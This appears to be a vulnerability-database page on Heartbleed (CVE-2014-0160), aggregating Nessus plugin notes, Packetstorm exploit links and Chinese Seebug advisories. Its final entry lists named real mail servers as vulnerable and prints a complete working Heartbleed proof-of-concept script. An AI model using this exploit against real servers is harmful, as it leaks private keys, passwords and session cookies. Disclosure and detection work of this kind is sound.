thank the OpenSSL project for reporting this issue. Upstream acknowledges Neel Mehta of Google Security as the original reporter. Users of the Red Hat Enterprise Virtualization Hypervisor are advised to upgrade to this updated package, which corrects this issue. last seen 2020-06-01 modified 2020-06-02 plugin id 79008 published 2014-11-08 reporter This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/79008 title RHEL 6 : rhev-hypervisor6 (RHSA-2014:0396) (Heartbleed) NASL family Windows NASL id OPENVPN_2_3_3_0.NASL description According to its self-reported version number, the version of OpenVPN installed on the remote host is affected by an out-of-bounds read error, known as the last seen 2020-06-01 modified 2020-06-02 plugin id 73668 published 2014-04-22 reporter This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/73668 title OpenVPN 2.3.x Heartbeat Information Disclosure (Heartbleed) NASL family Red Hat Local Security Checks NASL id HP_VCA_SSRT101531-RHEL.NASL description The RPM installation of HP Version Control Agent (VCA) on the remote Linux host is version 7.2.2, 7.3.0, or 7.3.1. It is, therefore, affected by an information disclosure vulnerability. An out-of-bounds read error, known as the last seen 2020-06-01 modified 2020-06-02 plugin id 77022 published 2014-08-06 reporter This script is Copyright (C) 2014-2018 Tenable Network Security, Inc. source https://www.tenable.com/plugins/nessus/77022 title HP Version Control Agent (VCA) Heartbeat Information Disclosure (Heartbleed) NASL family Solaris Local Security Checks NASL id SOLARIS11_OPENSSL_20140731.NASL description The remote Solaris system is missing necessary patches to address security updates : - The ssl3_take_mac function in ssl/s3_both.c in OpenSSL 1.0.1 before 1.0.1f allows remote TLS servers to cause a denial of service (NULL pointer dereference and application crash) via a crafted Next Protocol Negotiation record in a TLS handshake. (CVE-2013-4353) - The ssl_get_algorithm2 function in ssl/s3_lib.c in OpenSSL before 1.0.2 obtains a certain version number from an incorrect data structure, which allows remote attackers to cause a denial of service (daemon crash) via crafted traffic from a TLS 1.2 client. (CVE-2013-6449) - The DTLS retransmission implementation in OpenSSL 1.0.0 before 1.0.0l and 1.0.1 before 1.0.1f does not properly maintain data structures for digest and encryption contexts, which might allow man-in-the-middle attackers to trigger the use of a different context and cause a denial of service (application crash) by interfering with packet delivery, related to ssl/d1_both.c and ssl/ t1_enc.c. (CVE-2013-6450) - The Montgomery ladder implementation in OpenSSL through 1.0.0l does not ensure that certain swap operations have a constant-time behavior, which makes it easier for local users to obtain ECDSA nonces via a FLUSH+RELOAD cache side-channel attack. (CVE-2014-0076) - The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug. (CVE-2014-0160) last seen 2020-06-01 modified 2020-06-02 plugin id 80721 published 2015-01-19 reporter This script is Copyright (C) 2015-2018 Tenable Network Security, Inc. source https://www.tenable.com/plugins/nessus/80721 title Oracle Solaris Third-Party Patch Update : openssl (multiple_vulnerabilities_in_openssl4) (Heartbleed) NASL family Gentoo Local Security Checks NASL id GENTOO_GLSA-201412-11.NASL description The remote host is affected by the vulnerability described in GLSA-201412-11 (AMD64 x86 emulation base libraries: Multiple vulnerabilities) Multiple vulnerabilities have been discovered in AMD64 x86 emulation base libraries. Please review the CVE identifiers referenced below for details. Impact : A context-dependent attacker may be able to execute arbitrary code, cause a Denial of Service condition, or obtain sensitive information. Workaround : There is no known workaround at this time. last seen 2020-06-01 modified 2020-06-02 plugin id 79964 published 2014-12-15 reporter This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/79964 title GLSA-201412-11 : AMD64 x86 emulation base libraries: Multiple vulnerabilities (Heartbleed) NASL family Misc. NASL id IPSWITCH_IMAIL_12_4_1_15.NASL description The remote host appears to be running Ipswitch IMail Server 11.x or 12.x older than version 12.4.1.15 and is, therefore, potentially affected by the following vulnerabilities : - An error exists related to the implementation of the Elliptic Curve Digital Signature Algorithm (ECDSA) that could allow nonce disclosure via the last seen 2020-06-01 modified 2020-06-02 plugin id 76490 published 2014-07-14 reporter This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/76490 title Ipswitch IMail Server 11.x / 12.x < 12.4.1.15 Multiple Vulnerabilities (Heartbleed) NASL family Windows NASL id IBM_GPFS_ISG3T1020683.NASL description A version of IBM General Parallel File System (GPFS) prior to 3.5.0.17 is installed on the remote host. It is, therefore, affected by multiple vulnerabilities related to OpenSSL: - An information disclosure vulnerability exists due to a flaw in the OpenSSL library, due to an implementation error in ECDSA (Elliptic Curve Digital Signature Algorithm). An attacker could potentially exploit this vulnerability to recover ECDSA nonces. (CVE-2014-0076) - An information disclosure vulnerability exists due to a flaw in the OpenSSL library, commonly known as the Heartbleed bug. An attacker could potentially exploit this vulnerability repeatedly to read up to 64KB of memory from the device. (CVE-2014-0160) last seen 2020-06-01 modified 2020-06-02 plugin id 74104 published 2014-05-20 reporter This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/74104 title IBM General Parallel File System 3.5 < 3.5.0.17 Multiple OpenSSL Vulnerabilities (Heartbleed) NASL family Misc. NASL id VMWARE_HORIZON_WORKSPACE_VMSA2014-0004.NASL description The version of VMware Horizon Workspace installed on the remote host is version 1.8.x prior to 1.8.1. It is, therefore, reportedly affected by the following vulnerabilities in the OpenSSL library : - An error exists related to the implementation of the Elliptic Curve Digital Signature Algorithm (ECDSA) that could allow nonce disclosure via the last seen 2020-06-01 modified 2020-06-02 plugin id 73896 published 2014-05-06 reporter This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/73896 title VMware Horizon Workspace 1.8 < 1.8.1 OpenSSL Library Multiple Vulnerabilities (VMSA-2014-0004) (Heartbleed) NASL family Misc. NASL id OPENSSL_HEARTBLEED.NASL description Based on its response to a TLS request with a specially crafted heartbeat message (RFC 6520), the remote service appears to be affected by an out-of-bounds read flaw. This flaw could allow a remote attacker to read the contents of up to 64KB of server memory, potentially exposing passwords, private keys, and other sensitive data. last seen 2019-10-28 modified 2014-04-08 plugin id 73412 published 2014-04-08 reporter This script is Copyright (C) 2014-2018 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/73412 title OpenSSL Heartbeat Information Disclosure (Heartbleed) NASL family Windows NASL id ATTACHMATE_REFLECTION_SECURE_IT_FOR_WIN_CLIENT_HEARTBLEED.NASL description The Attachmate Reflection Secure IT Windows Client install on the remote host contains a component, Reflection FTP Client, which is affected by an out-of-bounds read error, known as the last seen 2020-06-01 modified 2020-06-02 plugin id 73965 published 2014-05-12 reporter This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/73965 title Attachmate Reflection Secure IT Windows Client Information Disclosure (Heartbleed) NASL family Misc. NASL id MCAFEE_EPO_SB10071.NASL description The remote host is running a version of McAfee ePolicy Orchestrator that is affected by an information disclosure due to a flaw in the OpenSSL library, commonly known as the Heartbleed bug. An attacker could potentially exploit this vulnerability repeatedly to read up to 64KB of memory from the device. last seen 2020-06-01 modified 2020-06-02 plugin id 73833 published 2014-05-02 reporter This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/73833 title McAfee ePolicy Orchestrator OpenSSL Information Disclosure (SB10071) (Heartbleed) NASL family Amazon Linux Local Security Checks NASL id ALA_ALAS-2014-320.NASL description A missing bounds check was found in the way OpenSSL handled TLS heartbeat extension packets. This flaw could be used to reveal up to 64k of memory from a connected client or server. last seen 2020-06-01 modified 2020-06-02 plugin id 73438 published 2014-04-09 reporter This script is Copyright (C) 2014-2015 Tenable Network Security, Inc. source https://www.tenable.com/plugins/nessus/73438 title Amazon Linux AMI : openssl Information Disclosure Vulnerability (ALAS-2014-320) NASL family SuSE Local Security Checks NASL id OPENSUSE-2014-318.NASL description This is an openssl version update to 1.0.1g. - The main reason for this upgrade was to be clear about the TLS heartbeat problem know as last seen 2020-06-05 modified 2014-06-13 plugin id 75331 published 2014-06-13 reporter This script is Copyright (C) 2014-2020 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/75331 title openSUSE Security Update : openssl (openSUSE-SU-2014:0560-1) (Heartbleed) NASL family Windows NASL id LIBREOFFICE_423.NASL description A version of LibreOffice 4.2.x prior to 4.2.3 is installed on the remote Windows host. This version of LibreOffice is bundled with a version of OpenSSL affected by multiple vulnerabilities : - An error exists in the function last seen 2020-06-01 modified 2020-06-02 plugin id 76510 published 2014-07-15 reporter This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/76510 title LibreOffice 4.2.x < 4.2.3 OpenSSL Multiple Vulnerabilities (Heartbleed) NASL family Misc. NASL id MCAFEE_VSEL_SB10071.NASL description The remote host has a version of McAfee VirusScan Enterprise for Linux (VSEL) that is affected by an information disclosure due to a flaw in the OpenSSL library, commonly known as the Heartbleed bug. An attacker could potentially exploit this vulnerability repeatedly to read up to 64KB of memory from the device. last seen 2020-06-01 modified 2020-06-02 plugin id 73854 published 2014-05-03 reporter This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/73854 title McAfee VirusScan Enterprise for Linux OpenSSL Information Disclosure (SB10071) (Heartbleed) NASL family Mandriva Local Security Checks NASL id MANDRIVA_MDVSA-2015-062.NASL description Multiple vulnerabilities has been discovered and corrected in openssl : Race condition in the ssl3_read_bytes function in s3_pkt.c in OpenSSL through 1.0.1g, when SSL_MODE_RELEASE_BUFFERS is enabled, allows remote attackers to inject data across sessions or cause a denial of service (use-after-free and parsing error) via an SSL connection in a multithreaded environment (CVE-2010-5298). The Montgomery ladder implementation in OpenSSL through 1.0.0l does not ensure that certain swap operations have a constant-time behavior, which makes it easier for local users to obtain ECDSA nonces via a FLUSH+RELOAD cache side-channel attack (CVE-2014-0076). The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug (CVE-2014-0160). The dtls1_reassemble_fragment function in d1_both.c in OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h does not properly validate fragment lengths in DTLS ClientHello messages, which allows remote attackers to execute arbitrary code or cause a denial of service (buffer overflow and application crash) via a long non-initial fragment (CVE-2014-0195). The do_ssl3_write function in s3_pkt.c in OpenSSL 1.x through 1.0.1g, when SSL_MODE_RELEASE_BUFFERS is enabled, does not properly manage a buffer pointer during certain recursive calls, which allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via vectors that trigger an alert condition (CVE-2014-0198). The dtls1_get_message_fragment function in d1_both.c in OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h allows remote attackers to cause a denial of service (recursion and client crash) via a DTLS hello message in an invalid DTLS handshake (CVE-2014-0221). OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h does not properly restrict processing of ChangeCipherSpec messages, which allows man-in-the-middle attackers to trigger use of a zero-length master key in certain OpenSSL-to-OpenSSL communications, and consequently hijack sessions or obtain sensitive information, via a crafted TLS handshake, aka the CCS Injection vulnerability (CVE-2014-0224). The ssl3_send_client_key_exchange function in s3_clnt.c in OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h, when an anonymous ECDH cipher suite is used, allows remote attackers to cause a denial of service (NULL pointer dereference and client crash) by triggering a NULL certificate value (CVE-2014-3470). Memory leak in d1_srtp.c in the DTLS SRTP extension in OpenSSL 1.0.1 before 1.0.1j allows remote attackers to cause a denial of service (memory consumption) via a crafted handshake message (CVE-2014-3513). The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other products, uses nondeterministic CBC padding, which makes it easier for man-in-the-middle attackers to obtain cleartext data via a padding-oracle attack, aka the POODLE issue (CVE-2014-3566). Memory leak in the tls_decrypt_ticket function in t1_lib.c in OpenSSL before 0.9.8zc, 1.0.0 before 1.0.0o, and 1.0.1 before 1.0.1j allows remote attackers to cause a denial of service (memory consumption) via a crafted session ticket that triggers an integrity-check failure (CVE-2014-3567). The ssl23_get_client_hello function in s23_srvr.c in OpenSSL 0.9.8zc, 1.0.0o, and 1.0.1j does not properly handle attempts to use unsupported protocols, which allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via an unexpected handshake, as demonstrated by an SSLv3 handshake to a no-ssl3 application with certain error handling. NOTE: this issue became relevant after the CVE-2014-3568 fix (CVE-2014-3569). The BN_sqr implementation in OpenSSL before 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k does not properly calculate the square of a BIGNUM value, which might make it easier for remote attackers to defeat cryptographic protection mechanisms via unspecified vectors, related to crypto/bn/asm/mips.pl, crypto/bn/asm/x86_64-gcc.c, and crypto/bn/bn_asm.c (CVE-2014-3570). OpenSSL before 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via a crafted DTLS message that is processed with a different read operation for the handshake header than for the handshake body, related to the dtls1_get_record function in d1_pkt.c and the ssl3_read_n function in s3_pkt.c (CVE-2014-3571). The ssl3_get_key_exchange function in s3_clnt.c in OpenSSL before 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k allows remote SSL servers to conduct ECDHE-to-ECDH downgrade attacks and trigger a loss of forward secrecy by omitting the ServerKeyExchange message (CVE-2014-3572). OpenSSL before 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k does not enforce certain constraints on certificate data, which allows remote attackers to defeat a fingerprint-based certificate-blacklist protection mechanism by including crafted data within a certificate last seen 2020-06-01 modified 2020-06-02 plugin id 82315 published 2015-03-30 reporter This script is Copyright (C) 2015-2019 Tenable Network Security, Inc. source https://www.tenable.com/plugins/nessus/82315 title Mandriva Linux Security Advisory : openssl (MDVSA-2015:062) NASL family Red Hat Local Security Checks NASL id REDHAT-RHSA-2014-0377.NASL description Updated openssl packages that fix one security issue are now available for Red Hat Storage 2.1. The Red Hat Security Response Team has rated this update as having Important security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section. OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL v2/v3) and Transport Layer Security (TLS v1) protocols, as well as a full-strength, general purpose cryptography library. An information disclosure flaw was found in the way OpenSSL handled TLS and DTLS Heartbeat Extension packets. A malicious TLS or DTLS client or server could send a specially crafted TLS or DTLS Heartbeat packet to disclose a limited portion of memory per request from a connected client or server. Note that the disclosed portions of memory could potentially include sensitive information such as private keys. (CVE-2014-0160) Red Hat would like to thank the OpenSSL project for reporting this issue. Upstream acknowledges Neel Mehta of Google Security as the original reporter. All users of Red Hat Storage are advised to upgrade to these updated packages, which contain a backported patch to correct this issue. For the update to take effect, all services linked to the OpenSSL library (such as httpd and other SSL-enabled services) must be restarted or the system rebooted. last seen 2020-06-01 modified 2020-06-02 plugin id 79005 published 2014-11-08 reporter This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/79005 title RHEL 6 : Storage Server (RHSA-2014:0377) (Heartbleed) NASL family Windows NASL id KASPERSKY_INTERNET_SECURITY_HEARTBLEED.NASL description The remote host has a version of Kaspersky Internet Security (KIS) installed that is missing a vendor patch. It is, therefore, affected by an information disclosure vulnerability. An out-of-bounds read error, known as the last seen 2020-06-01 modified 2020-06-02 plugin id 77437 published 2014-08-29 reporter This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/77437 title Kaspersky Internet Security Heartbeat Information Disclosure (Heartbleed) NASL family Misc. NASL id OPENVPN_HEARTBLEED.NASL description Based on its response to a TLS request with a specially crafted heartbeat message (RFC 6520), the remote OpenVPN service appears to be affected by an out-of-bounds read flaw. Because the remote OpenVPN service does not employ the last seen 2020-06-01 modified 2020-06-02 plugin id 73491 published 2014-04-14 reporter This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/73491 title OpenVPN Heartbeat Information Disclosure (Heartbleed) NASL family General NASL id VMWARE_PLAYER_LINUX_6_0_2.NASL description The installed version of VMware Player 6.x running on Linux is prior to 6.0.2. It is, therefore, reportedly affected by the following vulnerabilities in the OpenSSL library : - An error exists related to the implementation of the Elliptic Curve Digital Signature Algorithm (ECDSA) that could allow nonce disclosure via the last seen 2020-06-01 modified 2020-06-02 plugin id 73671 published 2014-04-21 reporter This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/73671 title VMware Player 6.x < 6.0.2 OpenSSL Library Multiple Vulnerabilities (VMSA-2014-0004) (Linux) (Heartbleed)
Packetstorm
data source https://packetstormsecurity.com/files/download/151177/secuvera-SA-2016-01.txt id PACKETSTORM:151177 last seen 2019-01-16 published 2019-01-16 reporter Simon Bieber source https://packetstormsecurity.com/files/151177/Streamworks-Job-Scheduler-Release-7-Authentication-Weakness.html title Streamworks Job Scheduler Release 7 Authentication Weakness data source https://packetstormsecurity.com/files/download/126288/massbleed.sh.txt id PACKETSTORM:126288 last seen 2016-12-05 published 2014-04-23 reporter 1N3 source https://packetstormsecurity.com/files/126288/Mass-Bleed-20140423.html title Mass Bleed 20140423 data source https://packetstormsecurity.com/files/download/126308/heartbleeddtls-leak.txt id PACKETSTORM:126308 last seen 2016-12-05 published 2014-04-24 reporter Ayman Sagy source https://packetstormsecurity.com/files/126308/Heartbleed-OpenSSL-Information-Leak-Proof-Of-Concept.html title Heartbleed OpenSSL Information Leak Proof Of Concept data source https://packetstormsecurity.com/files/download/126069/heartbleed-altered.py.txt id PACKETSTORM:126069 last seen 2016-12-05 published 2014-04-09 reporter Michael Davis source https://packetstormsecurity.com/files/126069/Heartbleed-User-Session-Extraction.html title Heartbleed User Session Extraction data source https://packetstormsecurity.com/files/download/126070/ssltest.py.txt id PACKETSTORM:126070 last seen 2016-12-05 published 2014-04-08 reporter Jared Stafford source https://packetstormsecurity.com/files/126070/Heartbleed-Proof-Of-Concept.html title Heartbleed Proof Of Concept data source https://packetstormsecurity.com/files/download/126072/heartbeat2.py.txt id PACKETSTORM:126072 last seen 2016-12-05 published 2014-04-09 reporter Jared Stafford source https://packetstormsecurity.com/files/126072/TLS-Heartbeat-Proof-Of-Concept.html title TLS Heartbeat Proof Of Concept data source https://packetstormsecurity.com/files/download/132254/poodle-poc.txt id PACKETSTORM:132254 last seen 2016-12-05 published 2015-06-10 reporter Bruno Luiz source https://packetstormsecurity.com/files/132254/This-POODLE-Bites-Exploiting-The-SSL-3.0-Fallback.html title This POODLE Bites: Exploiting The SSL 3.0 Fallback data source https://packetstormsecurity.com/files/download/126101/openssl_heartbleed.rb.txt id PACKETSTORM:126101 last seen 2016-12-05 published 2014-04-10 reporter Neel Mehta source https://packetstormsecurity.com/files/126101/OpenSSL-Heartbeat-Heartbleed-Information-Leak.html title OpenSSL Heartbeat (Heartbleed) Information Leak data source https://packetstormsecurity.com/files/download/126065/openssltls-disclose.txt id PACKETSTORM:126065 last seen 2016-12-05 published 2014-04-08 reporter Jared Stafford source https://packetstormsecurity.com/files/126065/OpenSSL-TLS-Heartbeat-Extension-Memory-Disclosure.html title OpenSSL TLS Heartbeat Extension Memory Disclosure
Redhat
| advisories |
| ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| rpms |
|
Seebug
bulletinFamily exploit description CVE ID:CVE-2014-0160 McAfee Email Gateway是一款全面的电子邮件安全解决方案。 McAfee Email Gateway所绑定的OpenSSL存在安全漏洞,OpenSSL处理TLS”心跳“扩展存在一个边界错误,允许攻击者利用漏洞获取64k大小的已链接客户端或服务器的内存内容。内存信息可包括私钥,用户名密码等。 0 McAfee Email Gateway 7.x 目前厂商已经发布了升级补丁以修复漏洞,请下载使用: https://kc.mcafee.com/corporate/index?page=content&id=SB10071 id SSV:62192 last seen 2017-11-19 modified 2014-04-16 published 2014-04-16 reporter Root title McAfee Email Gateway OpenSSL TLS心跳信息泄漏漏洞 bulletinFamily exploit description CVE ID:CVE-2014-0160 McAfee Endpoint Intelligence Agent是一款McAfee产品中所使用的一个网络服务。 McAfee Endpoint Intelligence Agent所绑定的OpenSSL存在安全漏洞,OpenSSL处理TLS”心跳“扩展存在一个边界错误,允许攻击者利用漏洞获取64k大小的已链接客户端或服务器的内存内容。内存信息可包括私钥,用户名密码等。 0 McAfee Endpoint Intelligence Agent 1.x (Formerly Network Integrity Agent) McAfee Endpoint Intelligence Agent 2.2.1版本已修复该漏洞,建议用户下载使用: http://www.mcafee.com id SSV:62238 last seen 2017-11-19 modified 2014-04-21 published 2014-04-21 reporter Root title McAfee Endpoint Intelligence Agent OpenSSL TLS心跳信息泄漏漏洞 bulletinFamily exploit description CVE ID:CVE-2014-0160 IBM AIX是一款商业性质的操作系统。 IBM AIX所绑定的OpenSSL存在安全漏洞,OpenSSL处理TLS”心跳“扩展存在一个边界错误,允许攻击者利用漏洞获取64k大小的已链接客户端或服务器的内存内容。内存信息可包括私钥,用户名密码等。 0 IBM AIX 6.x IBM AIX 7.x 用户可参考如下厂商提供的安全补丁以修复该漏洞: http://aix.software.ibm.com/aix/efixes/security/openssl_advisory7.doc http://www14.software.ibm.com/webapp/set2/subscriptions/onvdq?mode=18&ID=3489 id SSV:62187 last seen 2017-11-19 modified 2014-04-16 published 2014-04-16 reporter Root title IBM AIX OpenSSL TLS心跳信息泄漏漏洞 bulletinFamily exploit description CVE ID:CVE-2014-0160 IBM XIV Storage System是一款网格存储解决方案。 IBM XIV Storage System所绑定的OpenSSL存在安全漏洞,OpenSSL处理TLS”心跳“扩展存在一个边界错误,允许攻击者利用漏洞获取64k大小的已链接客户端或服务器的内存内容。内存信息可包括私钥,用户名密码等。 0 IBM XIV Storage System 11.3.0 IBM XIV Storage System 11.3.0.a IBM XIV Storage System 11.3.1 IBM XIV Storage System 11.4.1 IBM XIV Storage System 11.4.1.a 用户可参考如下厂商提供的安全公告获取补丁以修复该漏洞: http://www.ibm.com/support/docview.wss?uid=ssg1S1004577 id SSV:62188 last seen 2017-11-19 modified 2014-04-16 published 2014-04-16 reporter Root title IBM XIV Storage System OpenSSL TLS/DTLS心跳信息泄漏漏洞 bulletinFamily exploit description No description provided by source. id SSV:86061 last seen 2017-11-19 modified 2014-07-01 published 2014-07-01 reporter Root source https://www.seebug.org/vuldb/ssvid-86061 title Heartbleed OpenSSL - Information Leak Exploit (1) bulletinFamily exploit description No description provided by source. id SSV:86255 last seen 2017-11-19 modified 2014-07-01 published 2014-07-01 reporter Root source https://www.seebug.org/vuldb/ssvid-86255 title Heartbleed OpenSSL - Information Leak Exploit (2) - DTLS Support bulletinFamily exploit description CVE ID:CVE-2014-0160 SAP Sybase SQL Anywhere是一套全面的解决方案,它提供了数据管理、同步和数据交换技术,可快速在远程和移动环境中开发并配置数据库驱动的应用程序。 SAP Sybase SQL Anywhere所绑定的OpenSSL存在安全漏洞,OpenSSL处理TLS”心跳“扩展存在一个边界错误,允许攻击者利用漏洞获取64k大小的已链接客户端或服务器的内存内容。内存信息可包括私钥,用户名密码等。 0 SAP Sybase SQL Anywhere 12.x SAP Sybase SQL Anywhere 16.x SAP Sybase SQL Anywhere 12.01 ebf 4099或16.0 ebf 1881版本已修复该漏洞,建议用户下载使用: http://www.sap.com id SSV:62244 last seen 2017-11-19 modified 2014-04-21 published 2014-04-21 reporter Root title SAP Sybase SQL Anywhere OpenSSL TLS心跳信息泄漏漏洞 bulletinFamily exploit description No description provided by source. id SSV:86038 last seen 2017-11-19 modified 2014-07-01 published 2014-07-01 reporter Root source https://www.seebug.org/vuldb/ssvid-86038 title OpenSSL 1.0.1f TLS Heartbeat Extension - Memory Disclosure (Multiple SSL/TLS versions) bulletinFamily exploit description CVE ID:CVE-2014-0160 Splunk是机器数据的引擎。使用Splunk可收集、索引和利用所有应用程序、服务器和设备(物理、虚拟和云中)生成的快速移动型计算机数据。 Splunk所绑定的OpenSSL存在安全漏洞,OpenSSL处理TLS”心跳“扩展存在一个边界错误,允许攻击者利用 0 Splunk 6.x Splunk 6.0.3版本已修复该漏洞,建议用户下载使用: http://www.splunk.com id SSV:62198 last seen 2017-11-19 modified 2014-04-16 published 2014-04-16 reporter Root title Splunk OpenSSL TLS心跳信息泄漏漏洞 bulletinFamily exploit description CVE ID:CVE-2014-0160 OpenSSL是一种开放源码的SSL实现,用来实现网络通信的高强度加密,现在被广泛地用于各种网络应用程序中。 由于处理TLS heartbeat扩展时的边界错误,攻击者可以利用漏洞披露连接的客户端或服务器的存储器内容。 0 OpenSSL 1.0.2-beta OpenSSL 1.0.1 OpenSSL 1.0.1g版本以修复此漏洞,建议用户升级使用: http://www.openssl.org/ id SSV:62086 last seen 2017-11-19 modified 2014-04-08 published 2014-04-08 reporter Root source https://www.seebug.org/vuldb/ssvid-62086 title OpenSSL TLS Hearbeat信息泄漏漏洞 bulletinFamily exploit description No description provided by source. id SSV:86019 last seen 2017-11-19 modified 2014-07-01 published 2014-07-01 reporter lele source https://www.seebug.org/vuldb/ssvid-86019 title OpenSSL TLS Heartbeat Extension - Memory Disclosure bulletinFamily exploit description ### 简要描述: 打包了一堆网站,内存里有cookies :D ### 详细说明: eYouMail 5 inurl:edu 搜素出来就能有漏洞的机率90%左右 前三页成功的结果 ``` mail.jn.gov.cn mail.hpu.edu.cn mail.just.edu.cn mail.hnust.edu.cn mail.tjut.edu.cn mail.shupl.edu.cn mail.haust.edu.cn mail.dufe.edu.cn mail.jliae.edu.cn mail.hist.edu.cn dn1s.cmc.edu.cn mail.hbpu.edu.cn mail.dzu.edu.cn ``` POC送上 自己测试 ``` #!/usr/bin/python # Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford ([email protected]) # The author disclaims copyright to this source code. import sys import struct import socket import time import select import re from optparse import OptionParser options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)') options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)') def h2bin(x): return x.replace(' ', '').replace('\n', '').decode('hex') hello = h2bin(''' 16 03 02 00 dc 01 00 00 d8 03 02 53 43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00 00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88 00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09 c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44 c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11 00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04 03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19 00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08 00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13 00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00 00 0f 00 01 01 ''') hb = h2bin(''' 18 03 02 00 03 01 40 00 ''') def hexdump(s): for b in xrange(0, len(s), 16): lin = [c for c in s[b : b + 16]] hxdat = ' '.join('%02X' % ord(c) for c in lin) pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin) print ' %04x: %-48s %s' % (b, hxdat, pdat) print def recvall(s, length, timeout=5): endtime = time.time() + timeout rdata = '' remain = length while remain > 0: rtime = endtime - time.time() if rtime < 0: return None r, w, e = select.select([s], [], [], 5) if s in r: data = s.recv(remain) # EOF? if not data: return None rdata += data remain -= len(data) return rdata def recvmsg(s): hdr = recvall(s, 5) if hdr is None: print 'Unexpected EOF receiving record header - server closed connection' return None, None, None typ, ver, ln = struct.unpack('>BHH', hdr) pay = recvall(s, ln, 10) if pay is None: print 'Unexpected EOF receiving record payload - server closed connection' return None, None, None print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay)) return typ, ver, pay def hit_hb(s): s.send(hb) while True: typ, ver, pay = recvmsg(s) if typ is None: print 'No heartbeat response received, server likely not vulnerable' return False if typ == 24: print 'Received heartbeat response:' hexdump(pay) #print pay if len(pay) > 3: print 'WARNING: server returned more data than it should - server is vulnerable!' else: print 'Server processed malformed heartbeat, but did not return any extra data.' return True if typ == 21: print 'Received alert:' hexdump(pay) print 'Server returned error, likely not vulnerable' return False def main(): opts, args = options.parse_args() if len(args) < 1: options.print_help() return s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) print 'Connecting...' sys.stdout.flush() s.connect((args[0], opts.port)) print 'Sending Client Hello...' sys.stdout.flush() s.send(hello) print 'Waiting for Server Hello...' sys.stdout.flush() while True: typ, ver, pay = recvmsg(s) if typ == None: print 'Server closed connection without sending Server Hello.' return # Look for server hello done message. if typ == 22 and ord(pay[0]) == 0x0E: break print 'Sending heartbeat request...' sys.stdout.flush() s.send(hb) hit_hb(s) if __name__ == '__main__': main() ``` ### 漏洞证明: [<img 